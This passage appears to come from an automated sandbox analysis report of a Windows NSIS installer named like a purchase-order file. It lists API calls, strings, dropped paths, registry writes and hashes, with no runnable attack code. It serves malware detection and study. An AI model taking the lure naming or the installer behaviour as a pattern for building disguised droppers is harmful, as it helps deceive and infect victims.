                                                                       • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"$.DEFAULT\Control Panel\International$.exe$1033$@y$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                      • API String ID: 1975747703-3849932500
                                                                      • Opcode ID: 1f1d7b7cedc4fdc1a161c84c86f92609142e4f2c1f25f6f9bda009316c644032
                                                                      • Instruction ID: b6748c6733e3bb55aa357910a2c4fdec813f4d760fd6ac6bc3454eeade69f907
                                                                      • Opcode Fuzzy Hash: 1f1d7b7cedc4fdc1a161c84c86f92609142e4f2c1f25f6f9bda009316c644032
                                                                      • Instruction Fuzzy Hash: D06106B4504244AEE710AF659C45F3B3AACEB85789F00857FF900B22E1D77CAD019B2D

                                                                       Control-flow Graph: [graph rendering omitted]
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402C77
                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,00000400), ref: 00402C93
                                                                        • Part of subcall function 0040597F: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,80000000,00000003), ref: 00405983
                                                                        • Part of subcall function 0040597F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
                                                                      • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,80000000,00000003), ref: 00402CDF
                                                                      Strings
                                                                      • C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                      • Error launching installer, xrefs: 00402CB6
                                                                      • Inst, xrefs: 00402D4B
                                                                      • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                      • soft, xrefs: 00402D54
                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                      • Null, xrefs: 00402D5D
                                                                      • "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe", xrefs: 00402C66
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                      • String ID: "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                      • API String ID: 4283519449-2838533473
                                                                      • Opcode ID: 48d0b30a573a01b2c2b1968d3d6d53f6fa88bda45e86464b42b605cd2148996d
                                                                      • Instruction ID: fe9ef23653e85685a193ad9c5457c4b2e55d644b791d7b95544962d8ab1ad500
                                                                      • Opcode Fuzzy Hash: 48d0b30a573a01b2c2b1968d3d6d53f6fa88bda45e86464b42b605cd2148996d
                                                                      • Instruction Fuzzy Hash: CC51F471941214AFEB119F65DE89B9E7BA8EF04364F14803BF904B62D1D7BC8D408BAD

                                                                       Control-flow Graph: [graph rendering omitted]
                                                                      APIs
                                                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes,00000000,00000000,00000031), ref: 00401790
                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes,00000000,00000000,00000031), ref: 004017BA
                                                                        • Part of subcall function 00405D0C: lstrcpynA.KERNEL32(?,?,00000400,0040319A,Regangen Setup,NSIS Error), ref: 00405D19
                                                                        • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                        • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                        • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0), ref: 00404F81
                                                                        • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll), ref: 00404F93
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsq8002.tmp$C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes$Call
                                                                      • API String ID: 1941528284-522038915

                                                                      Control-flow Graph: function at 00404F25 (graph image not reproduced)
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                      • lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                      • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0), ref: 00404F81
                                                                      • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll), ref: 00404F93
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll
                                                                      • API String ID: 2531174081-16754438

                                                                      Control-flow Graph: function at 004053EB (graph image not reproduced)
                                                                      APIs
                                                                      • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040542E
                                                                      • GetLastError.KERNEL32 ref: 00405442
                                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405457
                                                                      • GetLastError.KERNEL32 ref: 00405461
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                      • API String ID: 3449924974-4250707527

                                                                      Control-flow Graph: function at 00406037 (graph image not reproduced)
                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040604E
                                                                      • wsprintfA.USER32 ref: 00406087
                                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040609B
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                      • String ID: %s%s.dll$UXTHEME$\
                                                                      • API String ID: 2200240437-4240819195

                                                                      Control-flow Graph: function at 00402E9F (graph image not reproduced)
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CountTick$wsprintf
                                                                      • String ID: ... %d%%
                                                                      • API String ID: 551687249-2449383134

                                                                      Control-flow Graph: function at 00402364 (graph image not reproduced)
                                                                      APIs
                                                                      • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023A2
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023C2
                                                                      • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023FB
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CloseCreateValuelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsq8002.tmp
                                                                      • API String ID: 1356686001-2063696683
                                                                      • Opcode ID: d74034fd92c64aa2ed621a3478c433a983ffe71421c626bffd0a4e4897772b2d
                                                                      • Instruction ID: 90de9cbbb944b5ce7c16acb051fe3e73370ea29dc9d439d86f68b9f38bc34e97
                                                                      • Opcode Fuzzy Hash: d74034fd92c64aa2ed621a3478c433a983ffe71421c626bffd0a4e4897772b2d
                                                                      • Instruction Fuzzy Hash: 04117572E00108BFEB10AFA4EE89EAF767DEB54358F10403AF505B61D1D6B85D419B28

                                                                      Control-flow Graph
                                                                      • Graph image not reproduced; function 4059ae-4059f5, calling GetTickCount and GetTempFileNameA (legend: Executed / Not Executed)
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 004059C2
                                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059DC
                                                                      Strings
                                                                      • nsa, xrefs: 004059B9
                                                                      • "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe", xrefs: 004059AE
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004059B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-3704756738
                                                                      • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                      • Instruction ID: 14833181556f01f8699e9ecebe408800633a5ab51cc0013a882439dab00eebba
                                                                      • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                      • Instruction Fuzzy Hash: 2AF0E232708204ABEB109F15EC04B9B7B9CDF91720F00C03BFA049A181D2B598448B58

                                                                      Control-flow Graph
                                                                      • Graph image not reproduced; function 100016bd-1000180c, calling internal subfunctions (10001a5d, 100021b0, 100021fa, 100023da, 10001559, 10001266, 100027e8, 10002aa3, 10002589, 100023a0, 100014e2) and the APIs GlobalFree and FreeLibrary (legend: Executed / Not Executed)
                                                                      APIs
                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                      • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                        • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                        • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                        • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                      • String ID:
                                                                      • API String ID: 1791698881-3916222277
                                                                      • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                      • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                      • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                      • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                      APIs
                                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                                                        • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                        • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                        • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0), ref: 00404F81
                                                                        • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll), ref: 00404F93
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 2987980305-0
                                                                      • Opcode ID: bfae0568c449fe0c54a0939f3ae7a6896df299a99818b1744bd7ec33484920ac
                                                                      • Instruction ID: a6d6138a22214a2ec3127db012fcbe8ccdb9873b287714200ab65a7954d0c462
                                                                      • Opcode Fuzzy Hash: bfae0568c449fe0c54a0939f3ae7a6896df299a99818b1744bd7ec33484920ac
                                                                      • Instruction Fuzzy Hash: 93212B72904211EBDF217F648E4DAAE76B1AB45318F30423BF311B62D1C7BC4941DA6E
                                                                      APIs
                                                                        • Part of subcall function 00405817: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,?,00405883,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
                                                                        • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040582A
                                                                        • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040583E
                                                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                        • Part of subcall function 004053EB: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040542E
                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes,00000000,00000000,000000F0), ref: 00401634
                                                                      Strings
                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes, xrefs: 00401629
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes
                                                                      • API String ID: 1892508949-1484825760
                                                                      • Opcode ID: 396cb8d654c4bd1d9b031a888da28658032143c202452067c1c7f2463867fd2c
                                                                      • Instruction ID: 6ea9d176647784ede47dca84986b1d8040ea6f7a989068fde2debc666839409d
                                                                      • Opcode Fuzzy Hash: 396cb8d654c4bd1d9b031a888da28658032143c202452067c1c7f2463867fd2c
                                                                      • Instruction Fuzzy Hash: A2112B35404141ABDF217B650C405BF27F0EA92315738463FF591B22E2C63C0942A63F
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 004054C6
                                                                      • CloseHandle.KERNEL32(?), ref: 004054D3
                                                                      Strings
                                                                      • Error launching installer, xrefs: 004054B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID: Error launching installer
                                                                      • API String ID: 3712363035-66219284
                                                                      • Opcode ID: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                      • Instruction ID: 542db3fa263e6c3fd8363e81c561fcb1d1edc85eb607383f0aa2fc0e1be44d1e
                                                                      • Opcode Fuzzy Hash: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                      • Instruction Fuzzy Hash: 95E0BFF4A002097FEB10AB64ED45F7B7BACEB00645F108561FD10F6190D674A9549A79
                                                                      APIs
                                                                        • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                        • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                        • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0), ref: 00404F81
                                                                        • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll), ref: 00404F93
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                        • Part of subcall function 0040549D: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 004054C6
                                                                        • Part of subcall function 0040549D: CloseHandle.KERNEL32(?), ref: 004054D3
                                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 3521207402-0
                                                                      • Opcode ID: 5300586a977f739bb3b95f406a8e475e6bf3f04e18eaf9760632a053cb3b61ce
                                                                      • Instruction ID: f3d89628ed1a2f536a51da31c0d1f3bff78da2cc26dd4d815c67a837da1bf94c
                                                                      • Opcode Fuzzy Hash: 5300586a977f739bb3b95f406a8e475e6bf3f04e18eaf9760632a053cb3b61ce
                                                                      • Instruction Fuzzy Hash: 53016D31904114EBDF11AFA1CD89A9E7B72EF00344F10817BF601B52E1C7789A819B9A
                                                                      APIs
                                                                        • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000002DB,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                      • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                                      • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 004024C3
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Enum$CloseOpenValue
                                                                      • String ID:
                                                                      • API String ID: 167947723-0
                                                                      • Opcode ID: cb8d7e7e292cd3f0bc6c1f59dcd71b3952a721e666c2518bc090900559d161d0
